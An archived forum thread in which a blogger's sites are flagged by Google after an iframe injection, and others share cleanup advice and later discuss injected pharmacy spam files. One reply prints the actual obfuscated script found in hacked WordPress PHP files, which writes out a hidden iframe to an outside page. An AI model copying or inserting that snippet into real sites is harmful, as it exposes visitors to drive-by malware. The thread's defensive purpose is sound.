PDA

View Full Version : Google quarantined me



nomos
05-11-2009, 02:53 PM
This morning I got an email from Google with the subject line "Malware notification regarding deeptime.net." At first, I thought it was a phishing thing but then when I visited my sites in Firefox I was greeted with the big red "Reported Attack Site!" page. See for yourself: http://www.deeptime.net/blog/

Looking at the diagnostic in Google Webmaster Tools I get the following message which suggests that it's not actually my site at all that's the problem but this davtraff.com. I did a quick search on the domain and found people saying things like "If I catch this davtraff guy I'll punch him in the neck."

Anyway, my site is fucked and I have no idea what to do besides submit it for a review. But if anyone can offer any ideas or help I'd really appreciate it.




What is the current listing status for deeptime.net?
Site is listed as suspicious - visiting this web site may
harm your computer.

Part of this site was listed for suspicious activity 1 time(s)
over the past 90 days.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90
days, 4 page(s) resulted in malicious software being
downloaded and installed without user consent. The last
time Google visited this site was on 2009-11-04, and the
last time suspicious content was found on this site was
on 2009-11-04.

Malicious software is hosted on 1 domain(s), including
davtraff.com/.

This site was hosted on 1 network(s) including AS26347
(DREAMHOST).

Has this site acted as an intermediary resulting in further
distribution of malware?
Over the past 90 days, deeptime.net did not appear to
function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the
past 90 days.

How did this happen?
In some cases, third parties can add malicious code to
legitimate sites, which would cause us to show the
warning message.

droid
05-11-2009, 03:02 PM
I was running some WP blogs in work that got hacked with random links inserted into the text via javascript. This was inserted into each PHP file on the server:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

What version of wordpress are you running? I had to manually remove the offending code and upgrade.

sufi
05-11-2009, 03:03 PM
this happened to some of my webpages, i still am not really sure how - it looked like someone ftped in and added 3 lines of code to all html files, which downloaded some malicious javascripts that google disliked.
i did have to do a lot of find/replace, and change some passwords, but i was rehabilitated with google in a couple of days...

blacklisted by google = :cool:

massrock
05-11-2009, 03:17 PM
Wait, so is it google who've blocked the site or Dreamhost?

sufi
05-11-2009, 03:20 PM
Scan type: Auto-Protect Scan
Event: Security Risk Found!
Risk: Bloodhound.Exploit.193
File: C:\Documents and Settings\!!sufi!!\Local Settings\Temporary Internet Files\Content.IE5\0S5524X9\freeLooks[1].swf
Location: Unknown Storage
Action taken: Clean failed : Quarantine failed : Access denied
Date found: 05 November 2009 15:08:22
nice one!
not sure if i got that off droid's rash C&P or off of deeptime itself
(also never realised ibn sina invented deeptime, just goes to show...)

sufi
05-11-2009, 03:24 PM
code snippet deleted after a report of this thread throwing up a malware warning - nomos
this little nasty is at the bottom of your source code at http://www.deeptime.net/blog/

nomos
05-11-2009, 03:25 PM
thanks guys. so it sounds like a pain in the ass but not the end of the world. i might have some questions later though as i'm still unsure where to start and i have to run out at the moment.


Wait, so is it google who've blocked the site or Dreamhost?
yeah it's google that does the scans and designates 'attack sites.' firefox and safari receive the information and generate warning pages in front of the sites. the only thing that dreamhost has done is repeat the warning to me when i go to my control panel.

nomos
05-11-2009, 03:27 PM
[
code snippet deleted after a report of this thread throwing up a malware warning - nomos
this little nasty is at the bottom of your source code at http://www.deeptime.net/blog/

thanks a lot sufi. it's not showing up here but you mean the iframe right? how the hell did that get there?

sufi
05-11-2009, 03:31 PM
yeah it won't show up on dissensus as it's in tags, you can see it if you edit my post (altho sometimes you can post up bits of code that will make dissensus gib out cf. that thread of stelfox's)

these clever lot seem to have worked the exploit out, they are so techy techy that it's all over my head
http://jul.rustedlogic.net/newreply.php?id=6934&postid=193852

nomos
05-11-2009, 03:37 PM
thanks again. i'll go through that when i'm home. so far I've found 2 of those iframes


What version of wordpress are you running? I had to manually remove the offending code and upgrade.
I think I'm on 2.5.7. Looks like the same route for me. Riddim.ca got hit with it as well. It's on Joomla rather than WP.

Find and Replace party at mine tonight :cool:

nomos
05-11-2009, 07:25 PM
So it's called an iframe injection attack. A couple of IT friends have sent some tips and links that correspond with what's been said above. Sounds like it's not very serious but dealing with it will take a while - lots of backing up, reinstalling, etc.

Some reading for anyone else who might have to deal with this sort of thing...

http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://eisabainyo.net/weblog/2009/04/06/iframe-injection-attack/

I wouldn't be surprised if it came in via my very out-of-date Joomla install then spread to my wordpress blogs. It happened either through a compromised password or a worm on my computer, which I never expect, being on a mac.

Ness Rowlah
06-11-2009, 01:45 AM
>> Temporary Internet Files\Content.IE5

I am not sure, but if I take that as running IE5 then you really live in
the dark ages? There is no excuse for running that (unless you are at work and company policy and all that bollox).

nomos
06-11-2009, 02:07 PM
i worked on this til the we hours last night and i believe i've cleaned it all up. riddim.ca was obliterated in the process but i still have the data so it'll come back in a while. unfortunately another sub site might be gone for god. anyway, just waiting for the green light from google now.

nomos
15-06-2011, 02:05 AM
NEW PROBLEM :mad:

The other day I Googled an entry on my blog and, in the search results, the page title had been hijacked by "Viagra, Cialis, etc."

It wasn't an iFrame injection attack this time. Instead I found a file called "whois.da" at the root of each of my domains. Had a look inside and it contained hundreds of links to an online pharmacy.

So I changed my FTP passwords. But just now I checked and it's back.

Searching "whois.dat" produces nothing. Anyone have any idea what's going on here? It seems less likey that WordPress is the entry point this time. All of my passwords are supposed to be very strong.

john eden
15-06-2011, 09:20 AM
Sorry to hear that Paul - what else was on the site?

I only ask because mine got hacked last year through the shop - I was using an out of date version of the software because upgrading was such a pain.

All they did was insert fake bank pages, so it was easy to stop.

droid
15-06-2011, 10:44 AM
Do you have any out of date plug-ins or add-ons to the site? A .dat file is basically just a text file. The .dat files are writeable by the server, so typically when some attacker finds a way into your site (usually by exploiting some other out-of-date open source app) they write a little script to trawl over any writeable files in your document root and scrawl all over them with bad stuff. It might be an idea to check if there's any other writable files in there too.

nomos
15-06-2011, 02:04 PM
I've got several WordPress installs on there. I wondered last night if somehow they might be opening a backdoor, so I deleted the disused ones, updated the rest, and password protected a couple that needn't be publicly accessible. I'll weed out and update my plugins to see if that helps.

Frustrating if WP is the entry point but a little more reassuring than the idea that someone/something keeps cracking these passwords.

Thanks guys. ;) I'll report back.

droid
15-06-2011, 02:11 PM
It may not have been a password crack. If you have old wordpress installs that havent been updated then hackers can get in using published vulnerabilities, the same goes with plug-ins. If anything Id say its unlikely the passwords were hacked. Its almost certainly an out of date plugin or WP install.